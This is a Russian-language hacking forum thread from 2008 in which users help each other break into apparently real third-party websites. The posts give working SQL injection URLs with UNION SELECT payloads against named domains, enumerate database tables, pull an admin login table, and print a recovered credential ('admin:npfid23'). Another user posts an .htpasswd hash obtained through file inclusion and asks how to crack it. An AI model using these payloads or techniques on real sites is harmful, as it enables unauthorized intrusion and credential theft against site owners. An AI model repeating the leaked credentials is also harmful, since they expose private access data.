SQL непохек

Тема в разделе "Поиск уязвимостей", создана пользователем xeran, 1 сен 2008.

  1. xeran
    xeran Guest
    r3ddy,
    Может запрещено чтение базы (
     
    10 сен 2008
  2. Хел
    Хел Guest
    врядли, скорее фильтр стоит на операторы в скрипте.
     
    10 сен 2008
  3. NetSky
    NetSky Guest
    Это не совсем в тему скули, зато в тему непохека, т.к. темы "пхп непохек" я тут не нашел :) Кароче есть инфо из файла .htpasswd и etc/passwd
    В .htpasswd строка вида
    UnHidden Content:
    Код:
    holdek:2hTF/huddcKR6
    Т.к. в пхп-инъекте(инклуде) я, мягко говоря, не силен, это мой первый реальный опыт, прошу помочь, насколько я понял, holdek - ник, но немного погуглив узнал что пароль вроде зашифрован, т.к. ни к админке, ни к пхпмайадмин он не подходит и насколько я понял, зашиврован уж никак не в мд5 и не в base64, просветите :)
     
    10 сен 2008
  4. Хел
    Хел Guest
    r3ddy,
    DES в .htaccess насколько я помню шифруется по стандарту
     
    10 сен 2008
  5. NetSky
    NetSky Guest
    Спасибо, SoulFreaker
    Видимо пароль - 2hTF/huddcKR6 будем расшифровывать.

    HELP плиз тут _http://www.xaker.name/forvb/showthread.php?p=78060#post78060
    Если кто знает...
     
    Последнее редактирование модератором: 11 сен 2008
    11 сен 2008
  6. Хел
    Хел Guest
    r3ddy,
    ну да пароль зашифрован в 2hTF/huddcKR6 DES hash....чекни структуру деса я настолько точно уже не помню что в хтакцессе....в некоторых мд5 арп поподается но это не он точно...скорее всего дес..
     
    11 сен 2008
  7. xeran
    xeran Guest
    UnHidden Content:
    Тут смотрел сайт который выложил Zik в теме админки , нашел скулю, но вот беда вывода я ненашел.
    Мои запросы


    Код:
    http://www.bengaldens.com/detail_all.php?id=145+order+by+6--
    http://www.bengaldens.com/detail_all.php?id=145+UNION+SELECT+1,2,3,4,5,6--
    :sad:
    Zik или ты ломал не через скулю?
     
    11 сен 2008
  8. Хел
    Хел Guest
    xeran,
    _http://www.bengaldens.com/detail_all.php?id=145+and+0+UNION+SELECT+1,2,3,4,5,6-- в четверке вывод
     
    11 сен 2008
  9. Zik
    Zik Guest
    Код:
    http://www.bengaldens.com/detail_all_post.php?id=-149+union+select+1,2,table_name,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5+from+information_schema.tables+limit+17,1--
    ошибка неправильно кол во таблиц подобрали
     
    11 сен 2008
  10. Хел
    Хел Guest
    Zik,
    Код:
    http://www.bengaldens.com/detail_all.php?id=145+and+0+UNION+SELECT+1,2,3,31337,5%20,6-- 
    
    все тут ок смотри на вывод. во флеш вставке выводится 31337
     
    11 сен 2008
  11. xeran
    xeran Guest
    Не успел попробывать (
    SoulFreaker, хотелось бы поинтересоваться для чего это "+and+0+"
     
    12 сен 2008
  12. Хел
    Хел Guest
    xeran,
    булеву алгебру знаеш? там есть такие вещи как true (1) и false (0). В данном случае мы намеренно заставляем первую часть запроса не выполнится что приводит к отображению принтабельных таблиц (как раз во второй части запроса), что равносильно изменению значения переменной-параметра (подставить туда заведомо большое значение, не существующее реально, либо отрицательное, либо набор символов, лишь такого значения не существовало и первый запрос выполнился некорректно, но корректно синтаксически), а поскольку часто стали использовать вырезки посторонних символов из параметров и прочие методы (фильтры переменных), то легче всего использовать методы языка sql, то бишь с помощью него вполне легально сделать первый запрос не выполнившемся. Если мы введем +and+1 (или and+1=1 или and+2=2 или and+9 итд. такой же фигнт можно делать со строками) то если запрос синтаксически верен то будет всегда исполняться. Такими методами проверяется присутствие инъекции (в mysql например можно писать and+1, and+0, or+1, or+0, а в sybase и прочих ТОЛЬКО and+1=1 - ну то есть сравнивать что то с чем то, часто используется в подзапросах и посимвольном переборе), тоесть если выводится часть контента то все ок, если нет то инъекции нет. Кстати мне нравится инъекция в неожиданных местах, например при редиректе, когда вывод идет в адресную строку браузера, ну и подобных сему фишек. Скажу честно - очень много инъекций в редиректах как раз. Также те надо прочувствовать разницу между or и and, мне ща долго расписывать это, поэтому заюзай гугл. С помощью таких вставок можно обойти например авторизацию. Ну вот такая кофеварка в общем...если тема интересна стучи в асю, объясню вообще все что надо. Типа чтобы не повторял мои ошибки.
     
    12 сен 2008
  13. xeran
    xeran Guest
    SoulFreaker,
    Cенк, очень хорошее доступное обьяснение.
    Из написанного понял все.
    З.Ы. В асю в воскресенье стукну или седня )))
     
    Последнее редактирование модератором: 13 сен 2008
    13 сен 2008
  14. Хел
    Хел Guest
    xeran,
    все объяснил в аське, будут вопросы-обращайся.
     
    13 сен 2008
  15. Zik
    Zik Guest
    короче надыбал скулю на одном амеркетовском скуле все нашел и нужную колонку и нужные столбцы все вроде бы админа нашел нужно ток лог и пасс узнать и тут кердык такая трабла встала
    UnHidden Content:
    http://www.ibict.br/noticia.php?id=-512+union+select+1,concat_ws(0x2F,tent_login,tent_pass)+from+log_adm/*
     
    15 сен 2008
  16. Хел
    Хел Guest
    Zik,
    скорее всего таблица (с колонками) лежит в другой базе данных, а не в текущей. То есть аналогично как таблица с паролями для пользователей mysql лежит в user а обращаемся к ней mysql.user (где mysql отличная от нашей база данных). Если здесь версия базы 5 (не могу проверить - без соксов сейчас) то сделай следующий запрос:
    Код:
    http://www.ibict.br/noticia.php?id=512+and+0+union+select+0,table_schema+from+information_schema.tables+where+table_name=0x6c6f675f61646d/*
    
    а иначе придется написать скриптик который перебирает базы.

    зы

    жестко сказал)
     
    15 сен 2008
  17. Zik
    Zik Guest
    Хел, да бд 5ая, твой метод попробовал выдало стоку portal решил поискать др таблицы, пусто

    Добавлено через 5 минут
    на америкотовском сайте))))

    Добавлено через 13 минут
    а бд сама по себе
    5.0.32-Debian_7etch5-log редко с такими встречался
     
    Последнее редактирование модератором: 15 сен 2008
    15 сен 2008
  18. ~!Dok_tOR!~
    ~!Dok_tOR!~ Продвинутый
    Симпатии:
    23
    Zik

    Код:
    http://www.ibict.br/noticia.php?id=-512+union+select+1,convert(concat_ws(0x3a,version(),user(),database())+using+latin1)/*
    всё же просто )
     
    15 сен 2008
  19. Хел
    Хел Guest
    Zik,
    ну так тебе строку выдало, теперь делай так:
    Код:
    http://www.ibict.br/noticia.php?id=-512+union+select+1,concat_ws(0x2F,tent_login,tent_ pass)+from+portal.log_adm/*
    
    аа все вижу зашел на сайт...сказал бы в начале что ошибка какая %)
    Код:
    http://www.ibict.br/noticia.php?id=-512+union+select+1,aes_decrypt(aes_encrypt(concat_ws(0x2F,tent_login,tent_pass),0x73),0x73)+from+portal.log_adm/*
    
     
    Последнее редактирование модератором: 15 сен 2008
    15 сен 2008
  20. ~!Dok_tOR!~
    ~!Dok_tOR!~ Продвинутый
    Симпатии:
    23
    Код:
    http://www.ibict.br/noticia.php?id=-512+union+select+1,convert(concat_ws(0x3a,tent_login,tent_pass)+using+latin1)+from+portal.log_adm/*
    
    admin:npfid23

    Добавлено через 1 минуту
    неа так не будет )
     
    Последнее редактирование: 15 сен 2008
    15 сен 2008
Загрузка...